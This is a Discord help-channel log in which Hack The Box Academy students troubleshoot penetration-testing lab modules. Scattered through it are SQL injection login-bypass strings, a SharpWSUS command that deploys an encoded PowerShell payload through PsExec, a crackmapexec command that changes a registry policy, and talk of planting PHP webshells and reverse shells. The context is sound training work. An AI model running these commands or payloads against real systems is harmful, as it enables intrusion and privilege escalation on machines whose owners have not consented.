โ”Œโ”€[us-academy-1]โ”€[10.10.15.119]โ”€[htb-ac-1524803@htb-wtd4awftne]โ”€[~] โ””โ”€โ”€โ•ผ [โ˜…]$ proxychains4 -q crackmapexec smb 172.16.1.10 -u grace -p Inlanefreight01! --shares --verbose [10:58:21] INFO Socket info: host=172.16.1.10, hostname=172.16.1.10, kerberos=False, ipv6=False, connection.py:160 link-local ipv6=False [10:58:25] INFO Failed to create connection object for target 172.16.1.10, exiting...

compact geyser
#

none work

gray yacht
iron oracle
compact geyser
#

please๐Ÿ˜‡ im stuck like hell

sharp torrent
compact geyser
#

๐Ÿ˜ฆ

hushed coyote
#

Hi there. Iโ€™m doing the SIEM visualization example 4 and have a question: how can I get the correct date? The date Iโ€™m seeing seems to be invalid. And timestamp always shows up as @timestamp per week. I can define a โ€žcustomize time intervalโ€œ of for example โ€ž24 hoursโ€œ or โ€ž1 daysโ€œ, but that doesnโ€™t seem to change anything.

gray yacht
solar hedge
#

Hello. Working on "Skills Assessment - File Upload Attacks" but it seems I'm only getting GET requests from the web form upload and the entire module was focused on POST requests, am I missing something obvious here?

deep bay
#

@solar hedge you could DM me

solar hedge
sharp torrent
gray yacht
#

Can DM if you still can't get it, I can multi task.

sharp torrent
#

Okay, really appreciate the help, thanks a ton!

fringe hollow
#

any recomendations for free cloud vm hosting? Looking to run a Kali or Parrot that I can access from my MacOS or Windows

compact halo
#

Has anyone completed the Windows Priv Esc module? Seeking some info on the "Interact with Users" section

gray yacht
compact halo
gray yacht
compact halo
compact geyser
#

can i get some help withj networking fundamentals module?>
Which protocol manages data routing and delivery across networks?
i've done the whole module but this seem to not accept any syntax
i've done the whole module but this seem to not accept any syntax

#

not Internet protocol, IP/v4/v6, OSPF, BGP, RIP/V2, eigrp, igrp
none work

lofty brook
#

Good morning or evening
First question
How can I change id>1 to id=5
How to implement it in
.................................................................
| Admin panel
|
|Username. Unknown' OR '1'='1
|Password. Unknown' OR '1'='1
|
.................................................................

Second question

Instead if doing the entry in the space
.................................................................
https://125.0.0.1:3758 <---------------------Hier
................................................................. |
| Admin panel |
| |
|Username. .... |
|Password. .... |
| |
................................................................. |
Is it possible to injection directly in the URL ->--|

#

SQL Injection Fundamentals
Using Comments

dry cradle
#

does someone know the What type of network cable is used to transmit data over long distances with minimal signal loss? also in the network fundamentals - components of a network?

compact geyser
compact geyser
dry cradle
#

oooooh thanks ๐Ÿ™‚

lost dragon
#

I swear... htb academy sometimes... Thanks a lot!

dry cradle
#

nwm still doesnt work

#

idk what im doing wrong

stiff bone
#

can someone help me with Intro to C2 Operations with Sliver -> SA-> Q4. I have completely looted SRV09 and now I need to abuse the domains trust somehow. I guess I need to make a diamond or gold ticket, I have done both but I can't access DC01. Can someone in DM check if I am doing this correctly or if I am missing something?

safe star
#

@hexed ferry does it give anything with --show?

#

or is it saying exhausted?

hexed ferry
#

nope. Says exhausted

safe star
#

what module?

#

are you sure it can get cracked?

hexed ferry
# safe star what module?

Sorry. Not a module. I am practicing for the cpts and I have an AD environment set up. I am literally the one who set the password and I'm going through the motions to make sure I'm doing things right. I even double checked...

safe star
#

yeah not sure tbh try john to see if its a hashcat issue

hexed ferry
#

john doesn't see it either lol

safe star
#

you put it straight to a output file right?

#

only thing i can think of is the formatting

hexed ferry
#

yeah. I'll do some more digging... but the format is good

compact geyser
dry cradle
#

Nah :/

compact geyser
#

Fiber-optic is the correct one sorry mate

dry cradle
#

I tried it so many times

#

Its the 5th day now

compact geyser
#

i coppy and pasted the correct answer from my screen

#

this syntax should work i think

dry cradle
#

YES THANKS

compact geyser
#

way to go my dude!

shrewd tendon
#

Hi, i got stuck on this question, someone can help me?:

Windows Event Logs & Finding Evil Module
Analyzing Windows Event Logs En Masse

Utilize the Get-WinEvent cmdlet to traverse all event logs located within the "C:\Tools\chainsaw\EVTX-ATTACK-SAMPLES\Lateral Movement" directory and determine when the \*\PRINT share was added. Enter the time of the identified event in the format HH:MM:SS as your answer.

amber moon
#

on CPTS exam is there a lot of time consuming password brute force? The module is hard takes a lot of time even when using the other services.... takes time even if I already know the password....

fathom pendant
empty trout
#

i uploaded a php webshell it is not executing php

amber moon
#

check the web if its running php

fathom pendant
empty trout
#

module = attacking common services section = skill assessment easy

#

i am usingn wwwolf-php-webshell

fathom pendant
#

I don't recall using a specialized shell, just basic php shell

empty trout
#

i tried basic reverse shell . when going to the url it is downloading the shell and not executing it

fathom pendant
#

Then are you sure that a revshell is the way? :)

#

If it's not executing a basic php shell, why would an advances one work?

empty trout
#

i reached to the forum and people there are saying they can execute commands via webshell so tried webshell

fathom pendant
#

Everything you need to know to pass is given by the module

empty trout
#

ok

rocky dirge
#

Does anyone know if HTB asks me to pwn the machine through the Windows virtual box when I'm in a module? I connect with XFree, but when I spawn the IP from the last section, the Windows virtual box closes. Does anyone know why?
It's the buffer overflow module.

#

Stack-Based Buffer Overflows on Windows x86

fathom pendant
#

It's to prevent the servers from getting bogged down

rocky dirge
#

Ok , but how do I connect it through the Windows Virtual Box?

fathom pendant
#

You don't?

rocky dirge
#

no , Tip: If you want to download the assessment.zip file to the Windows VM for debugging, right-click on the button below, and select 'Copy Link', then download it in PwnBox and copy it to the remote server.

#

in windows vm

#

and is a different section

fathom pendant
#

I meant that you're not gonna be able to. Period

#

Not questioning that you haven't tried. Its just literally not possible to do so

rocky dirge
#

Okey and how pwn it?

#

xd

fathom pendant
#

Use your own windows machine/vm to compile and not rely on htb to spoonfeed you dev boxes

merry pagoda
#

Hello, Iโ€™m new to this field and trying to learn. I have a question:
Can I ask for help here in solving a certain machine, or is it not allowed?

rocky dirge
#

Ok, tysm marciele

waxen totem
fathom pendant
lime cosmos
#

hey i cant ssh to the machine , i check the access to the ip of the machine by ping yes it pinged .
module: Introduction to Windows Command Line section: User and Group Management

fathom pendant
#

Don't reveal hashes for modules

iron oracle
#

Sorry about that

vivid wave
#

Hey everyone. Currently having issues with the following module because the box keeps going offline or something and won't respond to pings. This also happened for one of the previous tasks within the same module but was able to work around it by brute forcing the login with the attack box, however I'm not so fortunate this time around. So far I've used smtp-user-enum to get the user but now when trying to brute force the pw I get a bunch of connection related errors on both my personal kali VM + the Parrot attack-box from htb.

Module - Attacking Common Services - Skills Assessment - Easy

#

it'll respond to pings every once in awhile then when i try to resume from where i left off it just falls off again after a few seconds

#

i should also mention i've tried resetting the box prob 4 of 5 times now but no luck :/

rustic sage
#

Try a different VPN

#

My VPN too stops working after a while, so switching it just fixes it

vivid wave
rustic sage
#

All good bro!

raven zealot
#

Hey all, just starting my HTB journey. Is the Silver annual membership worth it? I definitely need some hand holding. I tried TryHackMe and wasn't a huge fan.

fathom pendant
#

the walkthrough isn't really hand-holding so much as it is here's the solution it doesn't break it down at all

#

would be nice to have them be more explanatory but yk it is what it is

raven zealot
#

darn that is disappointing

#

I'll have to use YouTube for guidance

fathom pendant
#

well any modules above tier 0 shouldn't have guides online

#

:)

#

as per the ToS

raven zealot
#

Agreed haha I'm not even tier 0 yet

fathom pendant
#

imho the annual sub is worth it for the access to the walkthrough if you truly get stuck and swear you're doing the right thing

raven zealot
#

I would probably only get it if there is some sort of break down

#

I'm doing Linux fundamentals now and I know I need to read through everything, it is just overwhelming haha

elder matrix
#

quick question!

is this a thing: when you use sqlmap, identify the current user as dba which has file permissions... and then you cant read or write files.. but with the manual sqli, it works?

i have not confirmed that it works with the manual sqli, just wanna know if it's a possibility before i do it

neon wadi
#

In an assessment, like the one in the Documentation module, let's say I find 4 paths from unauthenticated user to Domain Admin, with different starting points (e.g. LLMNR poisoning, AS-REP roasting, weak local admin password, password in Description field), I assume I just need to pick one for the "Walkthrough" and use the others as "Findings". Are there any considerations as to which path is the one I should pick, given that they all start and finish in the same place, and would thus seem equally critical?

severe inlet
#

In web proxies skills assessment the question

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

i did select a position next to the cookie
and on payload processing i listed a prefix of the decoded cookie
and added both encodings in the reverse order

nothing is working tho every request is the same size
or should i md5 crack all 60 requests?

fathom pendant
#

Your whole cookie should be replaced, not just the one character, if you check the requests you'll see why

severe inlet
#

what should i submit as my answer the cookie or
the decoded cookie?

since now i'm starting to get "Resopnse Recieved" with various numbers unlike the first time

severe inlet
#

Omg thank you so much i thought we should submit the cookie LOL
now i solved it thank you so much

rare sky
#

Hi guys sorry for disorder, i have just finished the "Web Service & API attacks" module, and i have red on the forum that there is a way to finish the skill assessment with sqlmap. Can someone explain me please? beacause i have done it with a manual exploiting and i have also tried with sqlmap but it says me connection timeout and i don't know how to do.

ivory parrot
#

Hi, Im new silver memership too, have you done the setting up module? In the windows section it gives a link to download a set up windows vm, but I went to it and it said download unavailable....do you know where I can get something similar? I dont want to download something thats going to wreck my computer....thanks

waxen totem
waxen totem
regal ruin
#

why is like that if i run responder on pwnbox for llmnr poisioning it work but when i use my own machine it didnt give me any hashes...

#

even giving right interface..

waxen totem
#

Depends on your host machine's config, there might be ports in use that responder cant use and make sure to run with sudo

regal ruin
waxen totem
fathom pendant
regal ruin
fervent lantern
#

hello

neon wadi
lusty halo
#

Hey everyone, This is my first time using Discord for Hack The Box โ€“ I usually just read other messages. I'm currently working on the Information Gathering (Web Edition) lab, and I need some help. I've completed everything except for finding the email. After some research, I discovered that itโ€™s on d***.w***.inlanefreight.htb:port. However, despite my attempts, Iโ€™m unable to locate it. Iโ€™ve used ZAP for crawling and modified ReconSpider to allow scanning beyond just ports 80 and 443, but still no luck. I also added the domain to the appropriate file for resolving the correct IP with FinalRecon, and I found a lot of information in the harvest, including the correct IP, but still no success. Any help or suggestions would be greatly appreciated! Also, if anyone is working on the same labs and wants to collaborate and help each other out, feel free to reach out. Thanks in advance!

safe star
#

try ./req

ionic minnow
#

Section: Windows Privilege Escalation Skills Assessment Part 1
Hi, I'm currently trying to escalate my privilege with JuicyPotato. I able to obtain the correct CLSID but somehow the nc from my attacker machine isn't receiving any connection.

safe star
#

You might be running cmd/c nc.exe

safe star
#

what about in bash?

thin parrot
#

Need help on the Footprinting medium lab if anyone is here rn

ionic minnow
thin parrot
#

SMB is not working kike literally cannot connect due to "No workgroup available"

#

I should be doing everything correctly so im a tad lost

unreal summit
#

Pdf

safe star
thin parrot
#

nevermind figured it out

#

forgot to get rid of the -L flag

fervent lantern
#

Can you please help me? My problem is that the exercise above doesn't seem to work correctly, as it returns incorrect results. Use your browser's developer tools to see what request it sends when searching, and use cURL to search for "flag" and get the flag. I tried to follow it step by step, but I can't find the flag.

waxen totem
fervent lantern
#

web request

waxen totem
#

what have you tried so far?

fervent lantern
#

and I entered the web page in the network and I can't find the search.php. Well, I don't know how to do it to see it. I checked each one in the network.

#

I'm trying to read the entire page in the console and I still can't find the flag or am I missing something?

waxen totem
#

just tested it and it is in fact on the target you gave

fervent lantern
#

I think I'm going to have to improve my comprehension when I read.

#

/search.php?search=$ cannot be...

silk swan
#

Hello Guys, i'm new comer and doing setting up module, i'm bit shame about my question, I never download smthg from github, I would like to install pwndoc on windows, but not so easy, anyone to teach me this please ? thanks

swift dove
#

Hi Guys so I'm doing the Getting Started module and in the Service Scanning section the only reason I know the user is because they give it to me but is there a way of getting that user and password? am I going to see that later one?

drowsy raptor
#

download git for windows, and run git clone https://github.com/pwndoc/pwndoc

#

an easier way if you're on a linux is to clone the repo directly, zip it and transfer to your windows over a python http server

silk swan
silk swan
drowsy raptor
#

follow the first part

thin parrot
#

Nobody is online right now that can help :/

waxen totem
fervent lantern
#

It took me a while but finally I got this answer: curl -u admin:admin 94.237.59.30:41068/search.php?search=le
Leeds (UK)
Dudley (UK)
Leicester (UK)
Newcastle (UK)
Los Angeles (US)
Jacksonville (US)
Seattle (US) I thought I had it solved, I tried but failed again XDDDD

waxen totem
#

Read the question again

thin parrot
waxen totem
#

read and understand EVERY WORD

waxen totem
thin parrot
#

and i am almost absolutely certain i have it correctly pasted

#

without any ghost lines or anything

fervent lantern
#

Now calm down xDD

thin parrot
#

permission denied (publickey) ; erorr in librcrypto

waxen totem
thin parrot
#

ssh -i (file) user@ip

#

permissions for the rsa file is 600

#

so i dont think its that

waxen totem
#

you using the private key?

fathom pendant
#

is your openssl updated?

#

sometimes a libcrypto error means that

thin parrot
#

i found it on a mailbox a

#

all it contained was the key

#

im using pwnbox it should be i imagine

fathom pendant
#

your key contains
----BEGIN
<RSAKEY>
---END
?

thin parrot
#

It needs to contain begin and end? oh hell that might be why

fathom pendant
#

yes LOL

fervent lantern
#

Sorry for making you angry xD

waxen totem
fathom pendant
#

@fervent lantern don't share the flag :)))))))))))))))))))

fervent lantern
#

Oh sorry again I didn't know I won't do it again

#

okay okay

#

sorry

fathom pendant
#
  1. against ToS
  2. spoils for others
  3. allows others to just copy your answer without learning anything
thin parrot
#

no more hack the box at 2 am

#

i spent 30 minutes on that ๐Ÿ˜ญ

fathom pendant
fervent lantern
#

7 hours for a response and I almost got banned for my stupidity xD

#

๐Ÿ˜ข

waxen totem
fathom pendant
#

just a simple warning; we all get caught up in excitement

thin parrot
tulip copper
#

I am doing the Login Brute Forcing module section Brute Force Attacks question "After successfully brute-forcing the PIN, what is the full flag the script returns?" Using pin-solver.py it brute forces pins 0000-9999 but its running so slow I don't think I will complete the brute force in time currently running at 200 attempts every 5 minutes. I tried using my home lab, pwnbox switching the vpns between tcp and udp. (Fixed seems running PWNBox on the US server did the trick, running Pwnbox on AU slow and running US VPN from oceania on my home lab was slow, reduced the rtt from 300ms to 150ms i.e 1000 req per 10 mins to about 1000 per 5mins after playing around a bit with the vpn make sure your latency to the vpn server is low (top right in pwnbox) had mine around 9ms and it ran super fast)

#

Unsure if there is something else at play that I am missing?

#

I see here it should take 3-5 minutes.

wide wagon
#

Hi all I am currently working on "AD Enumeration & Attacks - Skills Assessment Part II" and the sql01 seems to be offline via ping and port 1433 is this intended?

fathom pendant
tulip copper
#

My ping rtt is 300ms would that impact it?

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

#

shouldn't impact too much

lusty halo
#

hay @fathom pendant This is my first time using Discord for Hack The Box โ€“ I usually just read other messages. I'm currently working on the Information Gathering (Web Edition) lab, and I need some help. I've completed everything except for finding the email. After some research, I discovered that itโ€™s on d.w.inlanefreight.htb:port. However, despite my attempts, Iโ€™m unable to locate it. Iโ€™ve used ZAP for crawling and modified ReconSpider to allow scanning beyond just ports 80 and 443, but still no luck. I also added the domain to the appropriate file for resolving the correct IP with FinalRecon, and I found a lot of information in the harvest, including the correct IP, but still no success. Any help or suggestions would be greatly appreciated!

fathom pendant
#

the one given by the module works just fine for outputting the results.json which would contain it

#

if you got the new api key; it would have been in the same results.json

#

:)

lusty halo
#

thank you so much so much

fathom pendant
#

next time: please don't @ me

#

and just ask and wait for an answer

lusty halo
#

got it sorry about that

fathom pendant
#

also ReconSpider gh tool is not the same as the ReconSpider.py tool in the module from creepy crawlies section

median gale
#

@main ridge are u sure the wifiphisher is the way for the second flag i am still stuck here but yet dont see any other way this would be achieved

lusty halo
#

got it thanks again

#

this was a great module

rustic sage
#

yowhy cant i talk in general chat

fathom pendant
main ridge
median gale
#

Thanks though

opaque geyser
#

Can someone help me with: Pki-esc1 , I was able to successfully get a cert.pem however I am unsure how to get the right one over to my Kali box in order to convert it, etc. Where would I find the updated cert.pem file on Bob and send it over to Kali.?

waxen totem
#

To whoever designed the shells&payloads skills assessment to require the use of RDP: I hate you kek

all in all though good module.

pseudo kiln
#

Makes the module much nicer imo, I too hated rdp

#

Even sshuttle would work and its super fast to setup

dry falcon
proud pine
#

It's not built for that.

dry falcon
#

How i get to know which things we can do and what we can't

proud pine
#

Another limitation is that it needs full packets, so a SYN scan from nmap won't work.

dry falcon
#

ok

#

what this in nmap it also say host down?

proud pine
#

because it tries to ping it, and as we just discussed, it can't. you have to use -Pn (as it tells you)

dry falcon
#

ok got it .

lime cosmos
#

hey i cant ssh to the machine , i check the access to the ip of the machine by ping yes it pinged .
module: Introduction to Windows Command Line section: User and Group Management

dry falcon
lime cosmos
#
โ•ญโ”€kali@kali ~ 
โ•ฐโ”€$ ssh mtanaka@10.129.203.105
Connection reset by 10.129.203.105 port 22
โ•ญโ”€kali@kali ~ 
โ•ฐโ”€$ nmap 10.129.162.12810.129.203.105                                                             255 โ†ต
โ•ญโ”€kali@kali ~ 
โ•ฐโ”€$ nmap 10.129.203.105                                                                           255 โ†ต
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-14 14:28 CET
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 9.60% done; ETC: 14:28 (0:00:09 remaining)
Nmap scan report for 10.129.203.105
Host is up (0.084s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 6.19 seconds
rustic sage
dry falcon
#

ok thz

shadow current
#

Hey! Working on Legacy right now and struggling to get an exploit to work new to all this and some help would be greatly appreciated. Feel free to DM! Thanks

wide wagon
#

General question: how can responder (smb) work on servers where shares exists? Doesnt the share block port 445 so that the responder can not intercept hashes on 445?

brave field
rustic sage
#

or are you meant to get root before user

pseudo kiln
wide wagon
exotic pilot
#

In the PHP Web Shells module I cannot find the same Proxy Settings Connection settings anywhere, the only one I can find in burp suite is Settings/Tools/Proxy/Proxy listeners as it is not describe how you got to Connection Settings> .... Found the answer by forwarding a few times as per the notes! Oops

languid falcon
#

Working on the skills assessment for Web Service and API attacks, I have the SOAP request and python script generated correctly. But cannot figure out how to inject. The script hangs when I run it without injection, but when I try to enter a payload I get syntax errors, Iโ€™ve tried every basic SQLi I can think of. Any tips or pointers?

keen walrus
#

guys ive been stuck on this module for like 2 whole days (using web proxies skilll assesment : the question is : + 5 Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload) : ive encoded the payload and added a prefix of the decoded cookie and than fuzzed with the burp intruder for 200 response but got nothing

earnest pasture
wide wagon
#

Moreover the question: should you run responder on every endpoint you get admin access to even if its on the same L2 network?

modern carbon
severe inlet
#

What would you guys recommend taking the exam of first
CBBH or CPTS?
i have both vouchers and idk which one to start with since when i finish CPTS i pretty much would be done with CBBH aswell except for a few modules that i can do in a few days

fathom pendant
#

they both have different focuses, so it's whichever you want first

#

I would focus more on understanding the module over speeding through it

severe inlet
flint palm
#

Guys who knows how to transfer files from windows machine to linux?

severe inlet
severe inlet
keen walrus
#

no respoonse from the intruer

severe inlet
keen walrus
#

burp intruder

#

idk what i did wrong tho

severe inlet
#

i did it yesterday in Burp intruder

fathom pendant
#

you should replace the whole cookie with your payload

keen walrus
#

in the hint

fathom pendant
#

prefix starts the 31 char then the payload adds the last character then you re-encode in the reverse order you decoded

keen walrus
#

ive added the cookie to the prefix nothing else tbh

severe inlet
#

First you should put the 31 long string as prefix
then you should encode it in reverse order of the previous question
and you should have the payload of alpha-num provided in the hint

After that you should get responses with different numbers in the "Response Recieved"
then look at the response and you should get the answer

#

i did it like this yesterday and it worked fine

keen walrus
#

ive added the string which is the decoded cookie after that ive encoded the payload in reverse from the way i did before , than added the encoded payload to the payload config and sent it

severe inlet
#

how many payload processing do you have in the right side?

keen walrus
#

one the prefix

#

of the decoded cookie

fathom pendant
#

that doesn't sound right

#

only one step?

keen walrus
#

wdym

severe inlet
#

it should be more than one

fathom pendant
#

^

#

you need to re-encode using the methods used to decode
For Example:
decode steps:

  • base64
  • hex
    encode steps:
  • hex
  • base64
keen walrus
#

oh shi

#

i did ascii hex

#

maybe thatll solve the issue helpfuly brb

severe inlet
#

Its an example

keen walrus
#

oh .

severe inlet
#

same Decode/Encode as the question before it but in reverse order

keen walrus
#

yeah i did it

#

but it got me this encoded payload

fathom pendant
#

what i said was an example, not the full steps to encode/decode to avoid spoilers

keen walrus
#

yeah that makes sanse

#

can i send the encoded payload here so u can inspect it ?

#

cause it ends with ==

#

so i dont think its the correct one

fathom pendant
#

decode steps a, b, c
encode steps c, b, a

#

and no, you can't, the module is above tier 0 so sharing anything related would be spoilers. My dms aren't open atm due to a handful of reasons

#

not to mention sharing stuff from skill assessments would be heavy spoilers

keen walrus
#

gotchu well support told me to go here figure it out

#

idk

#

im rlly stuck on this

severe inlet
#

i would suggest reading the question again and trying everything from start again
usually works for me, you will realize that you missed something or did something wrong

keen walrus
#

been on this for 2 days ive read it for too much times at this point sadglas

fathom pendant
#

i mean if you get a certification, it being a pseudonym wouldn't exactly be helpful for you, as far as changing it you're better off reaching out to support

compact patrolBOT
proud pine
#

No company would accept a cert without a real name.

fathom pendant
#

correct

#

also certification, not certificate

#

they are different things

flint palm
#

guys who knows commands for cookie extraction module provided not working

#

sqlite database

jolly crown
#

Alright lads, thanks! Deleting the posts. Sorry again

fathom pendant
jolly crown
#

Hahaha

severe inlet
jolly crown
#

Certifications have more weight, basically

fathom pendant
fathom pendant
severe inlet
#

Thank you so much for clarification

fathom pendant
#

Not to mention certification exams are required to do solo, you can work on prolabs with others

velvet owl
#

along with Q4 and Q6

deep bay
velvet owl
#

Can you explain please?

deep bay
fathom pendant
#

"I'm stuck" isn't really helpful for others helping you

#

Are you ssh into the target system? Did you run some of the commands given and in the cheatsheet?

velvet owl
velvet owl
#

Ohh thanks!

fathom pendant
#

The module gives a list of commands and a brief description of them

#

env gives you environment variables

#

Environment variables are always full caps

velvet owl
#

ah makes sense thank you!

fathom pendant
#

So you can always call it by typing echo ${varname}; i.e.
echo $SHELL or echo $MAIL

#

$ in bash signifies that you're calling a variable, so always be mindful

#

! is a history call

#

If you run into a password, for instance, that uses special characters, you'll want to wrap it in single quotes
'pa$$word!23'

empty trout
#

i was exporting a webshell via mysql where secure_file_priv variable is empty to the webroot of xampp server running on windows solving the easy skill assessment of the module = attacking common services when going to the url and running the webshell there is no output i tried normal echo statement to know if php is executing on it or not but still a blank while page

empty trout
#

???

empty trout
#

????

keen walrus
#

shi mb haHHAHAAHAH

#

i tought it was toji๐Ÿคฃ

fathom pendant
waxen totem
severe inlet
#
ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb'


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://academy.htb:PORT/
 :: Wordlist         : FUZZ: /opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

mail2                   [Status: 200, Size: 900, Words: 423, Lines: 56]
dns2                    [Status: 200, Size: 900, Words: 423, Lines: 56]
ns3                     [Status: 200, Size: 900, Words: 423, Lines: 56]
dns1                    [Status: 200, Size: 900, Words: 423, Lines: 56]
lists                   [Status: 200, Size: 900, Words: 423, Lines: 56]
webmail                 [Status: 200, Size: 900, Words: 423, Lines: 56]
static                  [Status: 200, Size: 900, Words: 423, Lines: 56]
web                     [Status: 200, Size: 900, Words: 423, Lines: 56]
www1                    [Status: 200, Size: 900, Words: 423, Lines: 56]
<...SNIP...>

in the module it says that we know those results are incorrect any idea why?

#

This is in the Vhost fuzzing in the FFUF module

iron oracle
#

Im following the CME command execution module and when i try to disable the localaccounttokenfilterpolicy as indicated in the module, i get a "it may be detected by AV" error. Anyone experience this? Thanks

โ”€[us-academy-1]โ”€[10.10.x.x]โ”€[htb-ac-1524803@htb-3ktza9iasb]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ crackmapexec smb 10.129.x.x -u Administrator -p [HIDDENPASS] --local-auth -x "reg add
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"

SMB 10.129.x.x 445 MS01 [-] wmiexec: Could not retrieve output file, it may have been detected by AV. If it is still failing, try the 'wmi' protocol or another exec method

severe inlet
empty trout
severe inlet
#

Ah i see thats why on the next section they did the -sf flag with 900
and thats how they knew for sure that the next results will be correct?

proud pine
fathom pendant
#

Not -sf

severe inlet
#

yeah sorry i only had a breif look at it since i didn't understand why these results were wrong

thank you all

fathom pendant
#

-fs, filter (out) size

#

-ms, match size

#

For every -f[x] options there's a corresponding -m[x]

uneven basalt
#

Anybody from staff can help with flawed VM created in module Web Attacks (Mass IDOR Enumeration)? Can describe issue in DM not to spoil

cloud urchin
#

what do you mean flawed vm

uneven basalt
#

basically on the very first step it's not working due to not creating any request that would be intercept-able via Burp upon clicking this link.

empty trout
#

on forum people are saying bruteforcing load_file() but how can we bruteforce it

uneven basalt
fathom pendant
solid epoch
#

i have a problem

#

i am in password attacks lab medium

#

i found some juicy stuff

#

in that ||doc|| a service is mentioned which doesn't run on that server

fathom pendant
solid epoch
#

also, my guess is to login via localhost, but how the hell is that possible without ssh access

fathom pendant
#

Are other remote access services open?

solid epoch
#

SMB and SSH only

fathom pendant
#

Well, looks like ssh is open to me. Did you try passwords you may have obtained?

solid epoch
#

ups yes

#

let me try :D

fathom pendant
#

:)))))

gloomy garnet
#

Hi, I started htb few days ago and now im stuck at the brute forcing skills assessment 2, can someone give me some support or any idea, how to progress?

foggy monolith
#

What path to what executable did you use as the SharpWSUS payload? Because this is doing absolutely nothing:

.\SharpWSUS.exe create /payload:"C:\Tools\SysinternalsSuite\PSExec64.exe" /args:"-accepteula -s -d powershell -e JABjAG<SNIP>AApAA==" /title:"NewAccountUpdate"
scarlet void
#

I have a question for the second to last question of the network foundations skill assessment. The FTP command used to retrieve a file is 'get' as far as I know. But 'get' doesn't solve the question. Format: XXXX also doesn't give me a hint as to how they want me to answer this.

fathom pendant
#

When you get a file you ________ it

spare river
#

or im stupid and missed something could also be highly possible

#

this is the smb module in the cpts path

#

anyway i rest my case

waxen totem
#

There's no "SMB" module, do you mean footprinting?

spare river
waxen totem
#

There is in fact a way to get that answer ๐Ÿ˜

fathom pendant
#

What's the module and section name

#

There's no "smb module" and there's a couple modules with smb related sections

spare river
#

i got the answer but not in the way its meant lol

fathom pendant
#

Fucking hell my cell service made me late af to the convo

spare river
fathom pendant
waxen totem
spare river
#

im not expecting anyone to do this for me but just in case anyone is experiecing the same issue in the future

fathom pendant
#

rpc should give you the correct answer as well, the smb version would be in the banner when you connect to the service, etc ยฏ_(ใƒ„)_/ยฏ

waxen totem
#

literally so many options: nmap service/banner scan, rpcclient, nc, smbclient(not so sure bout this one)

fathom pendant
#

(It took 5 business days to delete due to cell service)

spare river
#

ah